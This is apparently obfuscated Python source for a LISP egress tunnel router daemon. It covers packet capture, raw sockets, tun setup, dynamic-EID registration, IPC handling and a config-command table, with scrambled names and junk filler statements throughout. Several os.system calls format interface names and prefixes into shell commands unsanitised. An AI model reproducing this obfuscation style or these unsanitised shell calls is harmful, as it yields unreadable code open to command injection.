if 96 - 96: oo . oooO0oo0oOOOO * II111iiii % oooO0oo0oOOOO . o0oo0o * i1IIi
if ( oO0oOOOooo ) :
if ( ooO . lower ( ) . find ( "ff02:" ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
if 83 - 83: iIii1I11I1II1
iiI1iiii1Iii ( ooO , ( O00oo0oOoO00O == False ) )
else :
Oo0O0O = oOO0
if ( O00oo0oOoO00O ) :
Oo0O0O += struct . pack ( "I" , i11I1Iii1I ( 0x17000000 ) )
else :
Oo0O0O += struct . pack ( "I" , i11I1Iii1I ( 0x16000000 ) )
if 8 - 8: i11iIiiIii * O0 + oOoO0oo0OOOo . iIii1I11I1II1 % OoOO0ooOOoo0O / OoOO0ooOOoo0O
if 70 - 70: oo + o0000oOoOoO0o
o0o = ooO . split ( "." )
oO0o0Ooooo = int ( o0o [ 0 ] ) << 24
oO0o0Ooooo += int ( o0o [ 1 ] ) << 16
oO0o0Ooooo += int ( o0o [ 2 ] ) << 8
oO0o0Ooooo += int ( o0o [ 3 ] )
Oo0O0O += struct . pack ( "I" , i11I1Iii1I ( oO0o0Ooooo ) )
i1I1i1i ( Oo0O0O )
time . sleep ( .100 )
if 76 - 76: i1I1ii1II1iII . oooO0oo0oOOOO % i1I1ii1II1iII - o0oo0o
if 51 - 51: OoooooooOO + Ooo00oOo00o * iIii1I11I1II1 * iiiiIi11i / i1IIi
time . sleep ( 10 )
if 19 - 19: i1I1ii1II1iII - oOo0O0Ooo % iiiiIi11i / OoooooooOO % i1I1ii1II1iII
return
if 65 - 65: O0 . iiiiIi11i
if 85 - 85: II111iiii
if 55 - 55: oOoO0oo0OOOo
if 76 - 76: iiiiIi11i - i11iIiiIii
if 27 - 27: oOoO0oo0OOOo - i11iIiiIii % o0oo0o / OoO0O00 . OoO0O00 / OoooooooOO
if 76 - 76: OoOO0ooOOoo0O * ooOO00oOo . iIii1I11I1II1 % OoooooooOO % oOoO0oo0OOOo
if 39 - 39: II111iiii * oOo0O0Ooo . O0 * OoOO0ooOOoo0O
if 89 - 89: o0000oOoOoO0o - Oo . OoOO0ooOOoo0O - o0oo0o - oo
if 79 - 79: oooO0oo0oOOOO + oooO0oo0oOOOO + o0000oOoOoO0o
if 39 - 39: O0 - OoooooooOO
def oo0O00ooo0o ( ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 29 - 29: OoooooooOO . II111iiii % oOo0O0Ooo
if 26 - 26: iIii1I11I1II1 - oOoO0oo0OOOo . oooO0oo0oOOOO . oooO0oo0oOOOO + iIii1I11I1II1 * OoO0O00
if 85 - 85: II11iiII + II111iiii - II11iiII * iiiiIi11i - i1IIi % i1I1ii1II1iII
if 1 - 1: OoooooooOO / O0 + oOo0O0Ooo + oOo0O0Ooo . o0oo0o - oOo0O0Ooo
if 9 - 9: o0oo0o * OoooooooOO % oo / oOo0O0Ooo * OoOO0ooOOoo0O
ii = lisp . lisp_get_all_multicast_rles ( )
if 47 - 47: i11iIiiIii / OoO0O00 - OoO0O00 * ooOO00oOo
if 48 - 48: oooO0oo0oOOOO
if 96 - 96: iiiiIi11i / O0 . II111iiii + oooO0oo0oOOOO % Ooo00oOo00o
if 67 - 67: O0 % o0oo0o
IIii1III = "any"
if 35 - 35: oo . oOo0O0Ooo + OoooooooOO % OoO0O00 % II11iiII
if 39 - 39: o0000oOoOoO0o
if 60 - 60: II11iiII
o000ooOo0o0OO = pcappy . open_live ( IIii1III , 1600 , 0 , 100 )
if 1 - 1: iIii1I11I1II1 % Oo + O0
IIiII11 = "(proto 2) or "
if 58 - 58: i1I1ii1II1iII
IIiII11 += "((dst host "
for I11IIIII in lisp . lisp_get_all_addresses ( ) + ii :
IIiII11 += "{} or " . format ( I11IIIII )
if 53 - 53: OoooooooOO . OoooooooOO + Ooo00oOo00o - i1I1ii1II1iII + II11iiII
IIiII11 = IIiII11 [ 0 : - 4 ]
IIiII11 += ") and ((udp dst port 4341 or 8472 or 4789) or "
IIiII11 += "(udp dst port 4342 and ip[28] == 0x12) or "
IIiII11 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
if 44 - 44: o0oo0o - oooO0oo0oOOOO
if 100 - 100: iiiiIi11i . ooOO00oOo - o0000oOoOoO0o + O0 * ooOO00oOo
lisp . lprint ( "Capturing packets for: '{}' on device {}" . format ( IIiII11 ,
IIii1III ) )
o000ooOo0o0OO . filter = IIiII11
if 59 - 59: II111iiii
if 43 - 43: OoO0O00 + OoooooooOO
if 47 - 47: Oo
if 92 - 92: OoOO0ooOOoo0O % i11iIiiIii % OoO0O00
o000ooOo0o0OO . loop ( - 1 , i11IiI1iiI11 , [ IIii1III , oOo0oooo00o ] )
return
if 23 - 23: II111iiii * i1I1ii1II1iII
if 80 - 80: o0oo0o / i11iIiiIii + OoooooooOO
if 38 - 38: oOoO0oo0OOOo % Oo + i1IIi * OoooooooOO * iiiiIi11i
if 83 - 83: iIii1I11I1II1 - Oo - o0oo0o / ooOO00oOo - O0
if 81 - 81: o0000oOoOoO0o - iiiiIi11i * oOoO0oo0OOOo / o0oo0o
if 21 - 21: ooOO00oOo
if 63 - 63: OoOO0ooOOoo0O . O0 * OoOO0ooOOoo0O + iIii1I11I1II1
def Ii1iIi ( ) :
global I11
global i1111
global Oo0o0000o0o0
global oOo0oooo00o
global oO0o0o0ooO0oO
global oo0o0O00
if 79 - 79: II11iiII % o0oo0o / iiiiIi11i - iIii1I11I1II1 - oOo0O0Ooo
lisp . lisp_i_am ( "etr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ETR starting up" )
if 60 - 60: II111iiii
if 90 - 90: oOo0O0Ooo
if 37 - 37: oOo0O0Ooo + O0 . O0 * OoO0O00 % o0oo0o / i1I1ii1II1iII
if 18 - 18: OoooooooOO
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 57 - 57: Oo . oOo0O0Ooo * Ooo00oOo00o - OoooooooOO
if 75 - 75: i11iIiiIii / Ooo00oOo00o . oooO0oo0oOOOO . i1IIi . i1IIi / OoOO0ooOOoo0O
if 94 - 94: Oo + oo
if 56 - 56: oOo0O0Ooo % Ooo00oOo00o
if 40 - 40: II11iiII / oooO0oo0oOOOO
if 29 - 29: o0000oOoOoO0o - o0000oOoOoO0o / Oo
if 49 - 49: OoOO0ooOOoo0O + iiiiIi11i % ooOO00oOo - OoO0O00 - O0 - OoooooooOO
if 4 - 4: II111iiii - iiiiIi11i % OoO0O00 * i11iIiiIii
if 18 - 18: OoO0O00 % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / oo
if 47 - 47: oOoO0oo0OOOo * iiiiIi11i + iIii1I11I1II1 - iiiiIi11i / oooO0oo0oOOOO
if 86 - 86: oooO0oo0oOOOO
if 43 - 43: oo / i1I1ii1II1iII / Oo + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - oooO0oo0oOOOO - Oo
if 92 - 92: ooOO00oOo * oooO0oo0oOOOO
IIiIi1iI = lisp . lisp_open_listen_socket ( "0.0.0.0" , str ( i11 ) )
IIiIi1iI . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_TTL , 32 )
i1111 = IIiIi1iI
if 92 - 92: iiiiIi11i
if 7 - 7: i1I1ii1II1iII
if 73 - 73: ooOO00oOo % oOoO0oo0OOOo
if 32 - 32: II11iiII + i1I1ii1II1iII + iIii1I11I1II1 * OoO0O00
I11 = lisp . lisp_open_listen_socket ( "" , "lisp-etr" )
if 62 - 62: i11iIiiIii
Oo0o0000o0o0 [ 0 ] = i1111
Oo0o0000o0o0 [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
Oo0o0000o0o0 [ 2 ] = I11
if 2 - 2: oo
if 69 - 69: OoooooooOO / OoO0O00 * o0oo0o
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * iiiiIi11i / II111iiii % OoooooooOO
if 14 - 14: oooO0oo0oOOOO . oooO0oo0oOOOO % Oo
if 42 - 42: Ooo00oOo00o . II11iiII - Oo
if 33 - 33: II111iiii / O0 / oooO0oo0oOOOO - OoOO0ooOOoo0O - i1IIi
if 8 - 8: i11iIiiIii . i1I1ii1II1iII / iIii1I11I1II1 / oOoO0oo0OOOo / oooO0oo0oOOOO - o0000oOoOoO0o
if 32 - 32: Ooo00oOo00o . i1IIi * OoO0O00
if 98 - 98: o0000oOoOoO0o - II111iiii / oo . iiiiIi11i * oooO0oo0oOOOO . OoOO0ooOOoo0O
oOo0oooo00o = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
oOo0oooo00o . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
Oo0o0000o0o0 . append ( oOo0oooo00o )
if 25 - 25: i11iIiiIii / oOo0O0Ooo - o0oo0o / ooOO00oOo . Ooo00oOo00o . Ooo00oOo00o
if 6 - 6: iiiiIi11i . OoOO0ooOOoo0O
if 43 - 43: oOoO0oo0OOOo + Ooo00oOo00o
if 50 - 50: iiiiIi11i % i1IIi * O0
if 4 - 4: iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + oooO0oo0oOOOO % i1IIi / oo % II111iiii
if 60 - 60: Ooo00oOo00o . oOo0O0Ooo % o0oo0o / oo / O0
if 19 - 19: i11iIiiIii . oo + II111iiii / II11iiII . oOoO0oo0OOOo * Oo
if 59 - 59: iIii1I11I1II1 / oOoO0oo0OOOo % Oo
if 84 - 84: iIii1I11I1II1 / oo . oOo0O0Ooo % OoOO0ooOOoo0O
if 99 - 99: OoO0O00 + i11iIiiIii
if 36 - 36: o0000oOoOoO0o * o0oo0o * iIii1I11I1II1 - OoOO0ooOOoo0O % i11iIiiIii
if 98 - 98: iIii1I11I1II1 - i1IIi + Oo % OoOO0ooOOoo0O + Oo / iiiiIi11i
if 97 - 97: oooO0oo0oOOOO % Oo + II111iiii - oooO0oo0oOOOO % ooOO00oOo + Oo
if 31 - 31: Ooo00oOo00o
if 35 - 35: oOo0O0Ooo + o0000oOoOoO0o * Oo / oOo0O0Ooo
if 69 - 69: Oo . II11iiII - oo
if 29 - 29: i11iIiiIii . oOoO0oo0OOOo / oo . II11iiII + i11iIiiIii
if 26 - 26: oooO0oo0oOOOO / o0000oOoOoO0o - OoooooooOO
if 9 - 9: OoooooooOO * oOoO0oo0OOOo
if 9 - 9: OoO0O00 + i1I1ii1II1iII
if 64 - 64: O0 * oo / oo
if ( pytun != None ) :
oo0o0O00 = '\x00\x00\x86\xdd'
IIii1III = "lispers.net"
try :
oO0o0o0ooO0oO = pytun . TunTapDevice ( flags = pytun . IFF_TUN ,
name = IIii1III )
os . system ( "ip link set dev {} up" . format ( IIii1III ) )
except :
lisp . lprint ( "Cannot create tuntap interface" )
if 57 - 57: oOoO0oo0OOOo / OoooooooOO % oOoO0oo0OOOo . O0 / oOoO0oo0OOOo
if 63 - 63: oooO0oo0oOOOO + iIii1I11I1II1 + oo + o0oo0o
if 72 - 72: ooOO00oOo + i11iIiiIii + oOoO0oo0OOOo
if 96 - 96: iiiiIi11i % i1IIi / Ooo00oOo00o
if 13 - 13: II111iiii - OoO0O00 % i11iIiiIii + i1I1ii1II1iII
if 88 - 88: O0 . iiiiIi11i % oo
threading . Thread ( target = oo0O00ooo0o , args = [ ] ) . start ( )
if 10 - 10: oo + O0
if 75 - 75: O0 % iIii1I11I1II1 / oOo0O0Ooo % II11iiII / oooO0oo0oOOOO
if 31 - 31: i11iIiiIii * oOo0O0Ooo
if 69 - 69: i11iIiiIii
threading . Thread ( target = o0000O00oO0O , args = [ ] ) . start ( )
return ( True )
if 61 - 61: O0
if 21 - 21: ooOO00oOo % iIii1I11I1II1 . ooOO00oOo
if 99 - 99: Ooo00oOo00o * II11iiII % iiiiIi11i * iiiiIi11i + OoooooooOO
if 82 - 82: OoOO0ooOOoo0O / oOo0O0Ooo - II11iiII / Oo
if 50 - 50: II11iiII + ooOO00oOo . i11iIiiIii + oOoO0oo0OOOo + i11iIiiIii
if 31 - 31: iiiiIi11i * o0oo0o . oOo0O0Ooo * OoOO0ooOOoo0O
if 28 - 28: oooO0oo0oOOOO + oo - OoO0O00 % II11iiII . OoOO0ooOOoo0O + oo
def O0oO0 ( ) :
global o0oOoO00o
global oOOoo00O0O
if 65 - 65: II11iiII + o0oo0o - o0000oOoOoO0o
if 53 - 53: oo
if 96 - 96: ooOO00oOo - oooO0oo0oOOOO . OoooooooOO
if 10 - 10: o0oo0o
if ( o0oOoO00o ) : o0oOoO00o . cancel ( )
if ( oOOoo00O0O ) : oOOoo00O0O . cancel ( )
if 48 - 48: i1I1ii1II1iII * i1IIi % OoooooooOO * o0000oOoOoO0o * ooOO00oOo
if 7 - 7: i1I1ii1II1iII . o0000oOoOoO0o . i1I1ii1II1iII - o0oo0o
if 33 - 33: Oo + OoooooooOO - ooOO00oOo / i1IIi / OoooooooOO
if 82 - 82: oOoO0oo0OOOo / II11iiII - i1I1ii1II1iII / OoO0O00 * ooOO00oOo
lisp . lisp_close_socket ( Oo0o0000o0o0 [ 0 ] , "" )
lisp . lisp_close_socket ( Oo0o0000o0o0 [ 1 ] , "" )
lisp . lisp_close_socket ( I11 , "lisp-etr" )
return
if 55 - 55: OoooooooOO
if 73 - 73: oOo0O0Ooo - oOoO0oo0OOOo % OoO0O00 + oOoO0oo0OOOo - O0 . ooOO00oOo
if 38 - 38: O0
if 79 - 79: i1IIi . iiiiIi11i
if 34 - 34: o0oo0o * II111iiii
if 71 - 71: oooO0oo0oOOOO
if 97 - 97: oOoO0oo0OOOo
if 86 - 86: OoO0O00 - II11iiII . oOo0O0Ooo . II111iiii * oo . II111iiii
if 34 - 34: Ooo00oOo00o . o0oo0o % oooO0oo0oOOOO - O0 / o0oo0o
def Oo00OOoO0oo ( ipc ) :
ipc = ipc . split ( "%" )
iiIiI1ii = ipc [ 1 ]
IIi11ii11 = ipc [ 2 ]
if ( IIi11ii11 == "None" ) : IIi11ii11 = None
if 54 - 54: OoOO0ooOOoo0O % O0 - II11iiII % ooOO00oOo + ooOO00oOo . oooO0oo0oOOOO
iII1iii = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iII1iii . store_address ( iiIiI1ii )
if 99 - 99: ooOO00oOo / i1IIi . oOoO0oo0OOOo
if 23 - 23: o0000oOoOoO0o * Oo - OoOO0ooOOoo0O . O0 % iIii1I11I1II1
if 19 - 19: oo
if 66 - 66: iiiiIi11i / oOo0O0Ooo
ooo0O = lisp . lisp_db_for_lookups . lookup_cache ( iII1iii , False )
if ( ooo0O == None or ooo0O . dynamic_eid_configured ( ) == False ) :
lisp . lprint ( "ITR/ETR dynamic-EID configuration out of sync for {}" . format ( lisp . green ( iiIiI1ii , False ) ) )
if 13 - 13: II111iiii
return
if 55 - 55: OoO0O00 % i1IIi * OoOO0ooOOoo0O
if 95 - 95: II11iiII / II111iiii - Ooo00oOo00o % o0oo0o . OoOO0ooOOoo0O
if 63 - 63: iIii1I11I1II1 / Oo
if 24 - 24: OoO0O00 / iIii1I11I1II1 % II11iiII * oOo0O0Ooo - iIii1I11I1II1
if 50 - 50: II111iiii
if 39 - 39: II111iiii . oOo0O0Ooo - OoO0O00 * i1IIi . OoooooooOO
oOooO0 = None
if ( ooo0O . dynamic_eids . has_key ( iiIiI1ii ) ) : oOooO0 = ooo0O . dynamic_eids [ iiIiI1ii ]
if 44 - 44: oo
if ( oOooO0 == None and IIi11ii11 == None ) :
lisp . lprint ( "ITR/ETR state mismatch for {}" . format ( lisp . green ( iiIiI1ii , False ) ) )
if 55 - 55: iiiiIi11i . o0oo0o * o0oo0o
return
if 82 - 82: oo % ooOO00oOo % OoOO0ooOOoo0O + OoOO0ooOOoo0O
if 6 - 6: OoO0O00
if 73 - 73: o0oo0o * oOoO0oo0OOOo + Ooo00oOo00o - OoO0O00 . OoOO0ooOOoo0O
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . oo - iiiiIi11i + II11iiII + i1I1ii1II1iII % iiiiIi11i
if 13 - 13: II111iiii / oOo0O0Ooo / oOo0O0Ooo + Oo
if 49 - 49: O0 / II111iiii * oo - OoooooooOO . II111iiii % oooO0oo0oOOOO
if ( oOooO0 and IIi11ii11 ) :
if ( oOooO0 . interface == IIi11ii11 ) :
lisp . lprint ( "ITR sent redundant IPC for {}" . format ( lisp . green ( iiIiI1ii , False ) ) )
if 13 - 13: iiiiIi11i . iIii1I11I1II1 . II11iiII . oooO0oo0oOOOO
else :
lisp . lprint ( "Dynamic-EID {} interface change, {} -> {}" . format ( lisp . green ( iiIiI1ii , False ) , oOooO0 . interface , IIi11ii11 ) )
if 58 - 58: OoOO0ooOOoo0O
oOooO0 . interface = IIi11ii11
if 7 - 7: II111iiii / oooO0oo0oOOOO % OoOO0ooOOoo0O + oo - O0
return
if 45 - 45: oo / i1I1ii1II1iII + iiiiIi11i + oooO0oo0oOOOO
if 15 - 15: oo % ooOO00oOo
if 66 - 66: iiiiIi11i * i11iIiiIii . o0oo0o
if 92 - 92: iiiiIi11i
if 81 - 81: Ooo00oOo00o % oo - i1I1ii1II1iII / i11iIiiIii
if ( IIi11ii11 ) :
oOooO0 = lisp . lisp_dynamic_eid ( )
oOooO0 . dynamic_eid . copy_address ( iII1iii )
oOooO0 . interface = IIi11ii11
oOooO0 . get_timeout ( IIi11ii11 )
ooo0O . dynamic_eids [ iiIiI1ii ] = oOooO0
if 73 - 73: O0 * o0oo0o . i1IIi
OO00OoOO = lisp . bold ( "Registering" , False )
iiIiI1ii = lisp . bold ( iiIiI1ii , False )
lisp . lprint ( "{} dynamic-EID {} on interface {}, timeout {}" . format ( OO00OoOO ,
lisp . green ( iiIiI1ii , False ) , IIi11ii11 , oOooO0 . timeout ) )
if 45 - 45: II111iiii * i1IIi
o00oo0 ( Oo0o0000o0o0 , None , iII1iii , None , False )
if 25 - 25: oOo0O0Ooo + iIii1I11I1II1 % OoOO0ooOOoo0O / OoO0O00 * OoO0O00
if 51 - 51: iiiiIi11i - ooOO00oOo + i1I1ii1II1iII - Ooo00oOo00o . ooOO00oOo % oOoO0oo0OOOo
if 14 - 14: oo / O0
if 43 - 43: iiiiIi11i - oooO0oo0oOOOO % i11iIiiIii * II111iiii . o0oo0o - OoOO0ooOOoo0O
if ( lisp . lisp_is_macos ( ) == False ) :
iiIiI1ii = iII1iii . print_prefix_no_iid ( )
i11i111 = "ip route add {} dev {}" . format ( iiIiI1ii , IIi11ii11 )
os . system ( i11i111 )
if 36 - 36: OoOO0ooOOoo0O - oooO0oo0oOOOO . oooO0oo0oOOOO
return
if 60 - 60: i11iIiiIii * OoO0O00 % ooOO00oOo + ooOO00oOo
if 84 - 84: iIii1I11I1II1 + OoooooooOO
if 77 - 77: O0 * oOoO0oo0OOOo * iiiiIi11i + ooOO00oOo + oOoO0oo0OOOo - o0oo0o
if 10 - 10: oOoO0oo0OOOo + oooO0oo0oOOOO
if 58 - 58: oo + OoooooooOO / i1I1ii1II1iII . Oo % Ooo00oOo00o / oOoO0oo0OOOo
if ( ooo0O . dynamic_eids . has_key ( iiIiI1ii ) ) :
IIi11ii11 = ooo0O . dynamic_eids [ iiIiI1ii ] . interface
oooO0 = lisp . bold ( "Deregistering" , False )
lisp . lprint ( "{} dynamic-EID {}" . format ( oooO0 ,
lisp . green ( iiIiI1ii , False ) ) )
if 29 - 29: o0000oOoOoO0o * II11iiII * i1IIi . o0000oOoOoO0o * o0oo0o . Oo
o00oo0 ( Oo0o0000o0o0 , 0 , iII1iii , None , False )
if 54 - 54: i1I1ii1II1iII . i1IIi . oOoO0oo0OOOo * Ooo00oOo00o % i1I1ii1II1iII
ooo0O . dynamic_eids . pop ( iiIiI1ii )
if 30 - 30: OoOO0ooOOoo0O
if 85 - 85: II111iiii + Oo * OoOO0ooOOoo0O
if 12 - 12: o0000oOoOoO0o . oo % Ooo00oOo00o
if 28 - 28: o0000oOoOoO0o - oo % ooOO00oOo * o0oo0o
if ( lisp . lisp_is_macos ( ) == False ) :
iiIiI1ii = iII1iii . print_prefix_no_iid ( )
i11i111 = "ip route delete {} dev {}" . format ( iiIiI1ii , IIi11ii11 )
os . system ( i11i111 )
if 80 - 80: II11iiII * oooO0oo0oOOOO
if 4 - 4: iIii1I11I1II1 . o0oo0o + II111iiii % OoooooooOO
return
if 82 - 82: OoooooooOO / Oo * OoOO0ooOOoo0O * O0 . oOoO0oo0OOOo
if 21 - 21: II111iiii + OoO0O00
if 59 - 59: II11iiII + oo / II111iiii / oOo0O0Ooo
if 80 - 80: oOo0O0Ooo + iIii1I11I1II1 . oooO0oo0oOOOO
if 76 - 76: oo * II11iiII
if 12 - 12: iIii1I11I1II1 / OoOO0ooOOoo0O % o0000oOoOoO0o
if 49 - 49: ooOO00oOo + II111iiii / oooO0oo0oOOOO - O0 % o0000oOoOoO0o
if 27 - 27: ooOO00oOo + OoO0O00
if 92 - 92: oo % i1I1ii1II1iII
def iiiI1IiI ( ipc ) :
if ( lisp . lisp_register_all_rtrs ) : return
if 2 - 2: O0 % o0oo0o % oOoO0oo0OOOo % Ooo00oOo00o - OoO0O00
i1i11ii1 , oO , oO0OOOO0o0 = ipc . split ( "%" )
if ( lisp . lisp_rtr_list . has_key ( oO ) == False ) : return
if 95 - 95: i11iIiiIii
lisp . lprint ( "Process ITR IPC message, RTR {} has gone {}" . format (
lisp . red ( oO , False ) , lisp . bold ( oO0OOOO0o0 , False ) ) )
if 95 - 95: OoO0O00
IIiIi = lisp . lisp_rtr_list [ oO ]
if ( oO0OOOO0o0 == "down" ) :
lisp . lisp_rtr_list [ oO ] = None
return
if 49 - 49: oo
if 24 - 24: II111iiii / o0000oOoOoO0o . iIii1I11I1II1 - II111iiii % O0
IIiIi = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , oO , 32 , 0 )
lisp . lisp_rtr_list [ oO ] = IIiIi
return
if 8 - 8: ooOO00oOo % i1I1ii1II1iII . OoooooooOO - o0000oOoOoO0o % OoooooooOO
if 61 - 61: Ooo00oOo00o / i11iIiiIii
if 28 - 28: II11iiII / oOo0O0Ooo
if 30 - 30: Oo
if 57 - 57: Ooo00oOo00o * i11iIiiIii / oOo0O0Ooo
if 40 - 40: iIii1I11I1II1 - Oo / OoO0O00
if 24 - 24: iiiiIi11i - i1I1ii1II1iII / Oo
if 10 - 10: oOo0O0Ooo * i1IIi
def I1Ii1ii ( ipc ) :
oOOOoo0o , i1i11ii1 , iIIi1 , OoOo0O00 = ipc . split ( "%" )
OoOo0O00 = int ( OoOo0O00 , 16 )
if 9 - 9: II11iiII
I1i = lisp . lisp_get_echo_nonce ( None , iIIi1 )
if ( I1i == None ) : I1i = lisp . lisp_echo_nonce ( iIIi1 )
if 44 - 44: ooOO00oOo . i1I1ii1II1iII / OoOO0ooOOoo0O + OoO0O00 - ooOO00oOo / II111iiii
if ( i1i11ii1 == "R" ) :
I1i . request_nonce_sent = OoOo0O00
lisp . lprint ( "Waiting for echo-nonce 0x{} from {}" . format ( lisp . lisp_hex_string ( OoOo0O00 ) , lisp . red ( I1i . rloc_str , False ) ) )
if 93 - 93: iiiiIi11i - II11iiII + Ooo00oOo00o . iiiiIi11i / OoOO0ooOOoo0O
elif ( i1i11ii1 == "E" ) :
I1i . echo_nonce_sent = OoOo0O00
lisp . lprint ( "Sent echo-nonce 0x{} to {}" . format ( lisp . lisp_hex_string ( OoOo0O00 ) , lisp . red ( I1i . rloc_str , False ) ) )
if 52 - 52: o0oo0o + o0oo0o
if 73 - 73: Ooo00oOo00o . i11iIiiIii % OoooooooOO + Oo . OoooooooOO / II11iiII
return
if 54 - 54: oOo0O0Ooo . OoooooooOO
if 36 - 36: iiiiIi11i / II111iiii * oooO0oo0oOOOO % oOoO0oo0OOOo
if 31 - 31: II111iiii + II11iiII - OoooooooOO . OoOO0ooOOoo0O
if 28 - 28: o0000oOoOoO0o . oOoO0oo0OOOo
if 77 - 77: oOoO0oo0OOOo % II111iiii
OOo00o0oo0 = {
"lisp xtr-parameters" : [ lispconfig . lisp_xtr_command , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-server" : [ ooO00OO0 , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ OoooooOoo , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp group-mapping" : [ oOooO , {
"group-name" : [ False ] ,
"ms-name" : [ True ] ,
"group-prefix" : [ False ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"rle-address" : [ False ] ,
"sources" : [ ] ,
"address" : [ True ] } ] ,
"show database-mapping" : [ oO00 , { } ] ,
"show etr-keys" : [ IIi1I11I1II , { } ] ,
"show etr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 33 - 33: Ooo00oOo00o . II11iiII + Ooo00oOo00o / oOoO0oo0OOOo . OoO0O00 + oOo0O0Ooo
if 32 - 32: oooO0oo0oOOOO - Oo * i1I1ii1II1iII * OoOO0ooOOoo0O
if 84 - 84: o0000oOoOoO0o + oOoO0oo0OOOo % oo + i11iIiiIii
if 37 - 37: OoOO0ooOOoo0O % oOoO0oo0OOOo / Oo
if 94 - 94: OoOO0ooOOoo0O / ooOO00oOo . Ooo00oOo00o
if 1 - 1: OoO0O00 . II111iiii
if ( Ii1iIi ( ) == False ) :
lisp . lprint ( "lisp_etr_startup() failed" )
lisp . lisp_print_banner ( "ETR abnormal exit" )
exit ( 1 )
if 93 - 93: II111iiii . i11iIiiIii + II111iiii % iiiiIi11i
if 98 - 98: o0oo0o * iiiiIi11i * oOo0O0Ooo + o0000oOoOoO0o * i1I1ii1II1iII
ii11iI1iIiiI = [ i1111 , I11 ]
if 99 - 99: i11iIiiIii - i1I1ii1II1iII
while ( True ) :
try : o0O0O0O00o , OoOooOo00o , oOOOoo0o = select . select ( ii11iI1iIiiI , [ ] , [ ] )
except : break
if 28 - 28: oOoO0oo0OOOo + oOoO0oo0OOOo % oOo0O0Ooo
if 12 - 12: OoOO0ooOOoo0O
if 19 - 19: o0000oOoOoO0o * i1IIi % O0 + OoOO0ooOOoo0O
if 25 - 25: o0oo0o - o0000oOoOoO0o / O0 . OoooooooOO % oo . i1IIi
if ( i1111 in o0O0O0O00o ) :
i1i11ii1 , i1OOO0000oO , O0OOOOo0 , oOO0 = lisp . lisp_receive ( i1111 , False )
if 19 - 19: II111iiii / II111iiii % oOoO0oo0OOOo + iiiiIi11i + iiiiIi11i + i1I1ii1II1iII
if ( i1OOO0000oO == "" ) : break
if 4 - 4: Ooo00oOo00o + OoOO0ooOOoo0O / i1I1ii1II1iII + i1IIi % Ooo00oOo00o % i1I1ii1II1iII
